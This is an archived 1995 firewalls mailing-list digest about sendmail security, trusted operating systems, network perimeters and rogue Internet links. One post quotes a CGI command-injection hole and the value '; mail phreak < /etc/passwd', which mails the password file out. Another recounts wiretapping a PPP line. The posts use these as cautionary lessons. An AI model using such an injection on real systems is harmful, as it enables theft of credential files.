gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA14410 for ; Thu, 14 Sep 1995 09:49:34 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA00741; Thu, 14 Sep 1995 11:51:28 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 295520000; 14 Sep 95 12:48 CDT Received: from sctc.com by sccmailhost.sctc.com id 069910000; 14 Sep 95 12:48 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA26031; Thu, 14 Sep 1995 11:47:50 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA29955; Thu, 14 Sep 1995 11:47:49 -0500 From: Rick Smith Message-Id: <199509141647.LAA29955@shade.sctc.com> Subject: Re: Secure version of Sendmail To: Peter da Silva Date: Thu, 14 Sep 1995 11:47:49 -0500 (CDT) Cc: smith@sctc.com, firewalls@greatcircle.com In-Reply-To: <9509141616.AA24527@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 14, 95 11:16:27 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 863 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The point is that if you have a class B O/S you're more likely to skimp > on the application level stuff. If you get both, that's great, but you > usually only get one. I've seen this happen, too. This is why NCSC formal evaluation is too often irrelevant. If a trusted system is performing a security service, then the application software is often configured to circumvent the standard security measures in some places. This is OK if it's done right, and a huge problem if it's done wrong. Security is a property of overall system behavior. It's bad news to assume a platform can do it all for you, or that an application can do it all. The best defense needs them to work together. On the SNS Mail Guard the government evaluated the whole thing including the networking and application software. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Sep 14 13:09:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14551 for firewalls-outgoing; Thu, 14 Sep 1995 09:51:30 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA14530 for ; Thu, 14 Sep 1995 09:51:23 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA00769 for ; Thu, 14 Sep 1995 11:52:59 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 295650000; 14 Sep 95 12:49 CDT Received: from sctc.com by sccmailhost.sctc.com id 070040000; 14 Sep 95 12:49 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA26071; Thu, 14 Sep 1995 11:49:15 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA00106; Thu, 14 Sep 1995 11:49:14 -0500 Date: Thu, 14 Sep 1995 11:49:14 -0500 From: Rick Smith Message-Id: <199509141649.LAA00106@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Firewall off Mortal Kombat XIV Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ted Doty writes: >At the risk of being Yet Another Security Pinhead, this is the Wrong >Thing To Do. If we think that the number of clueless boneheaded application >developers is much larger than the number of clueless boneheaded kernel >developers, then The Right Thing To Do is to put general security hooks in >the kernel. Put not your faith in silver bullets, and certainly not in general security hooks in a kernel. To be useful, the kernel would have to anticipate everything about every application and provide a direct and simple way to represent the security policy any application might ever need. This rarely happens cleanly in practice. Thus, the application ends up implementing its own policy using (or misusing) hooks into the kernel's security mechanisms. Ergo, a bad enough mistake in the application will still yield a vulnerability regardless of how tough the kernel is. You have to balance responsibility for security between the application and the kernel. Neither can do the job alone. A boneheaded developer can implement an application with security holes just as effectively on a highly secure platform as on a DOS PC. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Sep 14 13:12:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15210 for firewalls-outgoing; Thu, 14 Sep 1995 10:03:05 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA15192 for ; Thu, 14 Sep 1995 10:02:57 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09930; Thu, 14 Sep 95 12:47:17 -0400 Date: Thu, 14 Sep 95 12:47:17 -0400 Message-Id: <9509141647.AA09930@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: re: firwall off Mortal Kombat... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jeff rites: >I agree. It is getting easier and easier for holes to be punched >through a large corporate "network perimeter". In my opinion (and >unfortunate experience), insiders are probably the ones who will do >the hole punching. Think itis a bit more complicated than that (excellent posting by the way). For years major corporations have had good site security, we just need to expand that to electronic communications. Virtual corporations are going to face all of the problems mentioned but good site security is essential. Add in good encryption between sites and you have a start. At the physical site level you *can* control connections (a CLASS capable telephone switch can regulate modems but you are going to have to rely on policy to control cellular unless you want to install jammers - not a bad idea BTW). Have been preaching multi-layer security and protected subnets for some time now - it makes sense and is doable - came at it from the opposite direction though, believe it is too draconian/labor intensive to try to control every node so security needs to move to the net/subnet level. >1. Instead of really on one big network perimeter in an organization, >there will evolve many different ones and multiple layers of perimeters. Agree with the caveat that the logical separations will be on physical lines & site specific while following more general corporate requirements. >2. Individual applications and hosts will become more hardened and >secure. For old applications, small individual sized "firewall-wrappers" will become available. I like the term "encapsulated" but that is a quibble. I do separate "trusted hosts" and "trusted subnets" from those containing general purpose workstations. > As the network perimeter erodes, it has to erode >to the the point of individual hosts or applications (or sets of hosts >and applications). So hosts will either become secure or have some kind >of secure wrapper/firewall. Not necessary for *all* processors but can see having more than one bastion/"trusted" network at a site. The fundamental security layer will remain at the site perimeter. Warmly, Padgett ps am on vacation and inna Holiday Inn at the moment so personal replies may have to wait - lotsa messages waiting and the hotel "dataport" was wired backwards 8*( From firewalls-owner Thu Sep 14 13:19:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15110 for firewalls-outgoing; Thu, 14 Sep 1995 10:01:14 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA15099 for ; Thu, 14 Sep 1995 10:01:05 -0700 Received: from Disclosure.COM by relay4.UU.NET with SMTP id QQzhei08442; Thu, 14 Sep 1995 13:00:04 -0400 Received: by Disclosure.COM (4.1/SMI-4.1) id AA05378; Thu, 14 Sep 95 13:00:10 EDT Date: Thu, 14 Sep 1995 13:00:09 -0400 (EDT) From: Scott Barman To: FIREWALLS Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: <9509141314.AA11050@damark.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 1995, Marcus J. Ranum wrote: > These kinds of things keep pointing me back to the basic >problems I believe we (the security dweebs of the world) are going >to face in the next 5 years: > > 1) The notion of "network perimeter" will erode to the point > where saying "protect all access into and out of your network" > will be greeted with hysterical giggles. Right now when I > say that many of my customers just look at me with a glazed > eyed expression as if to say, "pull the other one." *Will* erode?? What makes you think it hasn't already. Even being in the DC area where there are more spooks per captia than any place else in the US, I have seen more companies with a stronger facility security policies (where the policy is see the receptionist at the front desk before being allowed in) than I have with network policy. I mean I even had one person ask me "what's all the fuss being made about security?" One day I borrowed a test set from a friend who does telecom consulting (putting systems in offices, etc.). He said that one could pick this item up at a Radio Shack for around $30. Basically, it had two wires with aligator clips, an LCD redout (one line, 35 characters), and an RS-232 port. After going through this "what do you need encryption for" I gathered the participants and went on a little field trip: I found the box where the telco wires met the building. All I did to open the box was bang it with my fist once. Since I did learn something when I was a consultant at Bellcore and AT&T (I also asked my friend to show me how the unit worked), I attached the clips to the company's PPP line out (no, it's not the company where I am now). I was reading the traffic with little problem. The display gave me a snapsot of traffic, but I reminded them that I could attach a PC to the RS-232 port and capture EVERYTHING. It took the politically correct equivalent of bashing their heads in to show them that they needed to secure things. And this is a company whose people wear badges that are also key cards to access the building! Then I sat down at their machine to find it had the sendmail debug bug, allowed NFS mounts to root for anyone, had a '+' in the /etc/hosts.equiv file and a ton of non-local hosts in /etc/hosts (because the sys admin didn't understand how to properly configure a DNS and/or the resolver), and so on. On Thu, 14 Sep 1995, william.wells wrote: >I'm looking for an HP/UX system admin: I looked at tons of resumes >yesterday and found lots of DOS/Windows people. That tells me that our >upcoming batch of programmers are going to base their programming >skills on what PCs have; not great for Corporate security. People are >struggling with the concept of changing passwords; makes transferring >files between systems too hard. They also complain about having to >log into individual applications. People coming from the mainframe >shops of the 70s and 80s generally have seen security work; not so >with people whose only experience has been single user systems. The system adminstrator from the above was a Certified Novell Engineer and a Certified Novell Administrator. You walked into his cube, and these pieces of paper were prominantly displayed. Also displayed was a certificate from a local training program saying that the admin went through their courses. Not to downplay those programs (I know about them, I teach at one :-), they can only give one an overview of what it takes to do a good job on one machine. Most do not go that much into network security beyond the basics. Interestingly enough, this company wanted to fire this guy. They wanted this person, who had never touched any other type of computer or OS, to administer this Sun workstation after taking a course and be an expert. This is beyond admin policies and practices, this goes to corporate thinking that led me to a system that was wide open. So wide that if anyone knew they were running Samba, the PC back-ends would have been attacked too. NOTE: The admin wasn't fired. I gave him many lessons in administration and security as part of my contract. I hate to see folks like that who are trying but don't have the tools fired because of unrealistic expectations. Back to mjr: > 2) IPV6 will not save us. I don't expect that all the new > IP-based toaster ovens, Sega machines, and clock radios > are going to talk V6. By the time V6 actually exists, the > installed base will be too large to replace. To help get > your brain around the problem, consider the reaction if > someone suggested that the US change over to 220 volt > European power grids. You would get converters to do the power changes. In fact, they already exist. Most of us who has had the privledge to travel to Europe have these things. You can get a package that would handle almost all of Europe, Middle East and Asia for around $30-35 (less if on sale) in any luggage store. I suspect that the same option will be there for routers, hubs, and bridges. In fact, I have heard that one vendor (was it Cisco?) already has a prototype IPv6->IPv4 converter. How long did it take for the US oil companies to produce all unleaded gas? The conversion to IPv6 will probably take the same amount of time. mjr: > 3) The number of new network-aware and IP-aware apps is > now on an exponential growth curve. Consider, for a moment, > how the typical network app is developed today: > Version 1: no security > Version 2: security? next version > Version 3: something lame > With the increase in network-permeation, the actual number > of things that "get it right" will be close to zero. william.wells: >If the consumer wanted security, programmers would add it. The leading >home financial software packages support passwords; why? because the >people using their software don't want people snooping. When companies >lose market share because of poor security, vendors will add it. This >is what has happened with TCP/IP: people demanded it. We have browsers >and FTP which understand firewalls and proxies because the vendors >know they need to support them. Secure transactions on the Internet >are getting high visibility because the credit card companies want to >prevent valid card information from being stolen while it is being >transmitted on the Internet and they are in a position to do something >about it. Then someone else (sorry, I didn't save it to give proper attribution) wrote about these programmers doing neat and nifty things but their programs require root to run. Part of the problem, as has been sort of stated, is the background of those now entering the industry. When I interview people for entry level jobs, I hear about what they learn in school and am shocked about some of the things they do not teach! Now I didn't go to a high-powered computer science school (I started my college career as a music ed. major), but I came out and with a better understanding of some of the more technical issues of what I do, including security basics! I mean I have a hard time understanding why these kids do not have a basic understanding of what is going on behind those database engines or even a basic concept of ISAM in order to explain it! Without trying to make myself sound old, but who's teaching this stuff nowadays? I can find tons of Sybase programmers, but ask about what it would take to secure things for ad hoc querries? Nobody understands this or even why I would want it! mjr: > What does this all mean? It may mean that there's good >job security in being a computer professional. It may mean that YES!! I need the job and I don't think I can go back to music ed! :-) >someone is going to look at the situation and announce that we >have no clothes. I *HOPE* it means that someone will begin to >think of new computer security paradigms. Who knows what they >will be? I don't think we're going to win the war the way it's >going. Most of the time, when someone expands a building they make the foundation stronger. Now that the internet is being expanded, the foundation has to follow. I think IPsec out of IPv6 (now an "official" RFC, I understand) is a good step in the right direction, but it cannot end there. Companies need to take a proactive roll in coming up with better policies in this regard. William Wells said it best send he said: >If the consumer wanted security, programmers would add it. We, as professionals, need to make the consumer aware they need it and want it. Start there and things could move in a better direction! william.wells: >Anyway, I've been typing long enough. Time to get to work. Three phone calls... some debugging... and now it's lunch time!! :-) All I need is for someone to tell me how I can better convince people they need to think about security without having to come up with new politically correct ways of bashing it into them! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Thu Sep 14 13:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA23943 for firewalls-outgoing; Thu, 14 Sep 1995 12:40:35 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA23927 for ; Thu, 14 Sep 1995 12:40:29 -0700 Received: from vodka.sse.att.com (vodka.gc.att.com) by ig2.att.att.com id AA05853; Thu, 14 Sep 95 15:39:52 EDT Message-Id: <9509141939.AA05853@ig2.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Secure version of Sendmail To: peter@nmti.com (Peter da Silva) Date: Thu, 14 Sep 1995 15:39:46 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509141616.AA24527@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 14, 95 11:16:27 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > True enough. The point is, you have to identify and exploit > > appropriate holes in both sendmail and in the nonbypassible access > > control mechanism of the OS. A properly designed mechanism is going to > > present a different kind of penetration problem. > > The point is that if you have a class B O/S you're more likely to skimp > on the application level stuff. If you get both, that's great, but you > usually only get one. Yea right, I'm gonna go to the trouble of finding and administering a class B OS but I don't care enough about security to fix the application level bugs. The class B stuff protects the OS from the apps, but it doesn't ensure that the apps themselves work properly. However, it can monitor some aspects of the applications behavior. > > I just found another: > > sprintf(txt, "sendmail -f %s %s < %s", > user_provided_string, server_provided_string, tempname); > > in a web server CGI script. > > Just pop "; mail phreak < /etc/passwd" in as your address... > And you don't see the need for a secure OS undeneath your CGI scripts? Amazing. You should run it in a chroot jail as a bare minimum. A C2 or higher OS would be able to spot this kind of bug by monitoring what the CGI script does via the audit trail. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Thu Sep 14 13:34:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27005 for firewalls-outgoing; Thu, 14 Sep 1995 13:20:28 -0700 Received: from Disclosure.COM (di.disclosure.com [205.156.194.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA26972 for ; Thu, 14 Sep 1995 13:20:19 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA06557; Thu, 14 Sep 95 16:22:06 EDT Date: Thu, 14 Sep 1995 16:22:05 -0400 (EDT) From: Scott Barman To: firewalls@greatcircle.com Subject: I wish Java would go away... Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Once again, this has reared it's ugly head on me... I was wondering if anyone has done a security analysis of allowing Java applets behind a firewall? I finally got to see some documentation and (a) I am not impressed (Sun has this nack for doing neat things the wrong way--private email if you want to discuss this), (b) I saw a lot of stuff regarding these applets and Unix, but what if the client machines are pee cees? The NT and Windoze 95 weenies are jumping up and down going "oooo neat!" I'm still responding "oy vey!" :-) I need feed back from anyone who has run or evaluated it with security in mind. Besides Sun's propoganda, are there any documents on the net I can pick up that comments on it, pro or con? On more important item... can anyone compare and contrast what Sun is doing vs. SGI's web stuff for both its technical merrit and security? TIA scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Thu Sep 14 14:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27272 for firewalls-outgoing; Thu, 14 Sep 1995 13:24:46 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA27224 for ; Thu, 14 Sep 1995 13:24:26 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id PAA25817; Thu, 14 Sep 1995 15:21:29 -0500 Message-Id: <199509142021.PAA25817@psisa.com> Subject: Re: Secure version of Sendmail To: James_Dehnert@optilink.optilink.dsccc.com Date: Thu, 14 Sep 1995 15:21:29 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9509140842.ZM5969@earth.optilink.dsccc.com> from "James_Dehnert@optilink.optilink.dsccc.com" at Sep 14, 95 08:42:00 am From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1130 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Here here! I use smail on all our machines. My basic config file is about > 10 lines long. I have it up to 20 to do things a bit more uniformly but 10 > lines does all I need. > > The way I look at it, the easier it is to configure, the less chance your > going to screw it up. It has also passed all the tests I have given it based > on known sendmail problems. Yeah, that goes well as long as you don't need to mess around with the rulesets, which you can't reach via config files in Smail (and that's what was intend). So, in really messed up (real :) constellations, you don't get very far with Smail. I know both and there are places where Smail does the job just fine and Sendmail V8 is an overkill, but most of the times I need Sendmail V8. I guess, most of the times I'm just a poor son of a bitch ending up in messy environments :). Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz "And dsmit hailed: | _/\__ \| \ \ Pencom Systems Administration Services We shall smit thou |_| /___/|_|__\ on-site at IBM, Gov't Services, Boulder, CO forever!" From firewalls-owner Thu Sep 14 14:17:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27342 for firewalls-outgoing; Thu, 14 Sep 1995 13:25:14 -0700 Received: from gatekeeper2.mcimail.com (gatekeeper2.mcimail.com [192.147.45.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA27311 for ; Thu, 14 Sep 1995 13:25:04 -0700 Received: from mailgate2.mcimail.com (mailgate2.mcimail.com [166.38.40.100]) by gatekeeper2.mcimail.com (8.6.12/8.6.10) with SMTP id UAA08876; Thu, 14 Sep 1995 20:23:30 GMT Received: from mcimail.com by mailgate2.mcimail.com id ae25776; 14 Sep 95 20:22 WET Date: Thu, 14 Sep 95 15:20 EST From: Henry Lemon To: firewalls Subject: Rogue Internet connection Message-Id: <54950914202045/0003668858PL1EM@MCIMAIL.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------------------------------- ATTACHMENT ---------------------------------- DATE: Thu Sep 14, 1995 4:21 pm SUBJECT:Research WWW Until recently I was under the impression that our organization did not have Internet access. I recently discovered that one department has established a home grown network link. Forget about security policies. That won't happen until we crash and burn. Please evaluate this scenario for me. What are our risks? If the responses are appropriate for the list, please email directly. A PC was configured to serve modems to the local area network for dial-out service only, using software from Synergy Solutions called Modem Assist Plus. This software, which consists of both a client and server portion allows for transparent PC communications(COM) port redirection. It does this by capturing all data intended for the PC's COM port and bundling it into Netbios messages and sending them to the Server PC. This data is then unpacked and sent to one of the attached modems. The server in turn bundles any data it receives into Netbios messages and sends the data back to the client. This permits any PC based communication program to transparently access the modems on the Modem Server. Requests for modems are queued by the server and users are notified of the availability of a modem so that they can either wait in the queue or try to access a modem later. The client portion of the software is Windows based so that DOS conventional memory requirements are not a factor. Access to the internet is provided through CompuServe Inc.'s PPP/SLIP access using their WINSOCK.DLL. This WINSOCK is pre-configured to work properly with CompuServe's PPP/SLIP servers. All users access the same PPP/SLIP account. The modems and server are accessible from 6 A.M. to 6 P.M. Monday through Friday. The server and modems are on a timer that cuts the power at all other times. This was done to dissuade users from abusing the service. Currently the system will support four simultaneous connections. We have purchased a 50 seat network license to use Netscape Navigator for accessing the World Wide Web, newsgroups, ftp sites, and email. TIA Henry Lemon Opinions expressed are mine Aristech Chemical Corp. and not those of my employer 600 Grant St. Room 930 Pittsburgh PA 15201 LEMONH%A1%Aristech_Chemical_Corporation@mcimail.com From firewalls-owner Thu Sep 14 15:03:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA03596 for firewalls-outgoing; Thu, 14 Sep 1995 14:57:36 -0700 Received: from gatekeeper.alcatel.com.au (gatekeeper.alcatel.com.au [203.17.66.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA03587 for ; Thu, 14 Sep 1995 14:57:29 -0700 Received: from 139.188.22.50 (139.188.22.50) by gatekeeper.alcatel.com.au (PMDF V5.0-4 #11861) id <01HVAQ8IF7KW0000LS@gatekeeper.alcatel.com.au> for firewalls@greatcircle.com; Fri, 15 Sep 1995 07:54:33 +1000 Received: from gsms01.alcatel.oz.au (gsms01.alcatel.oz.au) by cbd.alcatel.oz.au (PMDF V5.0-3 #9241) id <01HVAQ9W84C09OD836@cbd.alcatel.oz.au> for firewalls@greatcircle.com; Fri, 15 Sep 1995 07:55:40 +1000 Received: (from jeremyp@localhost) by gsms01.alcatel.oz.au (8.6.12/8.6.12) id HAA22775 for firewalls@greatcircle.com; Fri, 15 Sep 1995 07:55:53 +1000 Date: Fri, 15 Sep 1995 07:55:53 +1000 From: Peter Jeremy Subject: Re: Secure version of Sendmail To: firewalls@greatcircle.com Message-id: <199509142155.HAA22775@gsms01.alcatel.oz.au> Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick writes: > The purpose of nonbypassable >access control mechanisms like Type Enforcement is to prevent the >inevitable bugs from allowing instant and complete compromise of the >system. What if the bugs are in the Type Enforcement code? I agree that running Sendmail V8 on a B1 OS (or something similar) is more secure than . But it does not guarantee that there isn't a gaping hole in the OS which lets you obtain sufficient access to wipe the audit trails and bypass the compartmentalisation (does such a word exist?). Peter. From firewalls-owner Thu Sep 14 16:36:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA08129 for firewalls-outgoing; Thu, 14 Sep 1995 16:10:22 -0700 Received: from upgrade.com (upgrade.com [199.174.17.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA08115 for ; Thu, 14 Sep 1995 16:10:16 -0700 Received: from upgrade.com ([127.0.0.1]) by upgrade.com (8.6.12/8.6.12) with ESMTP id TAA16907; Thu, 14 Sep 1995 19:07:40 -0400 Message-Id: <199509142307.TAA16907@upgrade.com> To: Scott Barman cc: FIREWALLS Subject: Re: Firewall off Mortal Kombat XIV In-reply-to: Your message of "Thu, 14 Sep 1995 13:00:09 EDT." Date: Thu, 14 Sep 1995 19:07:39 -0400 From: Christopher Nielsen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 14 Sep 1995 13:00:09 -0400 (EDT) Scott Barman wrote: -------- >> *Will* erode?? What makes you think it hasn't already. Even being in >> the DC area where there are more spooks per captia than any place else >> in the US, I have seen more companies with a stronger facility >> security policies (where the policy is see the receptionist at the >> front desk before being allowed in) than I have with network policy. >> I mean I even had one person ask me "what's all the fuss being made >> about security?" This same kind of thing has happened to me. We now have security guards at our front desk as opposed to just a locked door, but our network and system security is laughable. When I was hired, nearly everyone in the entire organization had the root password and did a large part of their work as root. That has changed since, but people were very unhappy about it. What's worse than people not understanding, is when upper management listens to what you have to say, pays you lip service, and then ignores your suggested changes and requests for needed equipment or staff. >> One day I borrowed a test set from a friend who does telecom consulting >> (putting systems in offices, etc.). He said that one could pick this >> item up at a Radio Shack for around $30. Basically, it had two wires >> with aligator clips, an LCD redout (one line, 35 characters), and an >> RS-232 port. After going through this "what do you need encryption for" >> I gathered the participants and went on a little field trip: When I suggested encrypted network connections, I was almost laughed out of the office. The CIO thought I was taking elicit drugs and being very paranoid. >> I found the box where the telco wires met the building. All I did to >> open the box was bang it with my fist once. Since I did learn something >> when I was a consultant at Bellcore and AT&T (I also asked my friend to >> show me how the unit worked), I attached the clips to the company's PPP >> line out (no, it's not the company where I am now). I was reading the >> traffic with little problem. The display gave me a snapsot of traffic, >> but I reminded them that I could attach a PC to the RS-232 port and >> capture EVERYTHING. Maybe I should try this, too... >> It took the politically correct equivalent of bashing their heads in to >> show them that they needed to secure things. And this is a company >> whose people wear badges that are also key cards to access the >> building! Then I sat down at their machine to find it had the sendmail >> debug bug, allowed NFS mounts to root for anyone, had a '+' in the >> /etc/hosts.equiv file and a ton of non-local hosts in /etc/hosts >> (because the sys admin didn't understand how to properly configure a DNS >> and/or the resolver), and so on. Sounds all too familiar... >> Then someone else (sorry, I didn't save it to give proper attribution) >> wrote about these programmers doing neat and nifty things but their >> programs require root to run. That was me. =) >> Part of the problem, as has been sort of stated, is the background of >> those now entering the industry. When I interview people for entry >> level jobs, I hear about what they learn in school and am shocked about >> some of the things they do not teach! Now I didn't go to a high-powered >> computer science school (I started my college career as a music ed. >> major), but I came out and with a better understanding of some of the >> more technical issues of what I do, including security basics! I mean I >> have a hard time understanding why these kids do not have a basic >> understanding of what is going on behind those database engines or even >> a basic concept of ISAM in order to explain it! Without trying to make >> myself sound old, but who's teaching this stuff nowadays? Well, being one that is still in school, I can say that they don't teach you anything that pertains to the real world. Everything I have learned about systems/network security has been through experience and self- teaching. >> "Micro$oft and Windoze/NT will be the cause of the de-evolution of >> network security just as the original PC and BASIC was the cause of >> the de-evolution of programming." If only my co-workers would understand this. =) -Chris =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Christopher Nielsen UCA&L System and Network Administrator Buffalo, New York (nielsenc@upgrade.com) #include From firewalls-owner Thu Sep 14 17:00:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA09287 for firewalls-outgoing; Thu, 14 Sep 1995 16:26:46 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA09272 for ; Thu, 14 Sep 1995 16:26:41 -0700 Received: from pm1-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA22978; Thu, 14 Sep 95 18:24:45 -0400 Date: Thu, 14 Sep 95 18:24:45 -0400 Message-Id: <9509142224.AA22978@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Peter da Silva From: frankw@in.net (Frank Willoughby) Subject: Re: Secure version of Sendmail Cc: smith@sctc.com, firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The point is that if you have a class B O/S you're more likely to skimp > on the application level stuff. If you get both, that's great, but you > usually only get one. I've seen this happen, too. This is why NCSC formal evaluation is too often irrelevant. If a trusted system is performing a security service, then the application software is often configured to circumvent the standard security measures in some places. This is OK if it's done right, and a huge problem if it's done wrong. Security is a property of overall system behavior. It's bad news to assume a platform can do it all for you, or that an application can do it all. The best defense needs them to work together. On the SNS Mail Guard the government evaluated the whole thing including the networking and application software. Rick. smith@sctc.com secure computing corporation   From firewalls-owner Thu Sep 14 17:03:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA09129 for firewalls-outgoing; Thu, 14 Sep 1995 16:25:51 -0700 Received: from dcc.com ([204.147.95.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA09107 for ; Thu, 14 Sep 1995 16:25:44 -0700 Received: by gateway.dcc.com id <58881>; Thu, 14 Sep 1995 18:32:30 -0500 From: "Moubray, Steve" To: "'firewalls@greatcircle.com'" Subject: Re: IPX firewall? Date: Thu, 14 Sep 1995 20:19:00 -0500 Encoding: 63 TEXT X-Mailer: Microsoft Mail V3.0 Message-Id: <95Sep14.183230cdt.58881@gateway.dcc.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rumar has it that the following was stated: -------- :From: Andrew Foss :Date: Tue, 12 Sep 1995 14:02:23 -0700 :Subject: Re: IPX firewall? : :At 08:23 AM 9/12/95 -0700, Bradley E. Hubbard wrote: :> :>Hello, :> :>I'm wondering if anyone knows of any firewall products that have been :>developed in and for an IPX environment? :Internet Junction(recently purchased by Cisco) has a gateway that converts :IPX to IP. It's available for Solaris, HP-UX, IRX ... :It has the advantage of not putting TCP stacks on the IPX clients, but it's :not the right solution for many people. :1. TCP stacks are now free and Win95 and all that jive from Redmond will :have it included. :2. The IJ product still requires a dll on all the PC's. :3. Compatability in gatewaying the 2 unlike protocols seems to be a :continual challenge. :4. It has to run as an application on a machine which will need to be :adequately secured itself. :5. Performance is limited. : :I don't want to offend anyone, but I think the right solution is just let :the IPX clients live in the IP world as opposed to trying to gateway their :protocols. :> :>Thanks in advance, :> :>Brad Hubbard :>behubba@rssi.com :> :> :Andrew Foss Tel. 415/494-NETS(6387) :Network Translation Inc. Dir. 415/855-0725 :1901 Embarcadero Rd. FAX 415/424-9110 :Palo Alto, CA 94303 email :afoss@translation.com : web www.translation.com Instant Internet offers a dedicated IPX to IP gateway that is similar to the Internet Junction package but doesn't require a dedicated WS. It comes in it's own little chassis (it's actually an Intel PC inside without a monitor 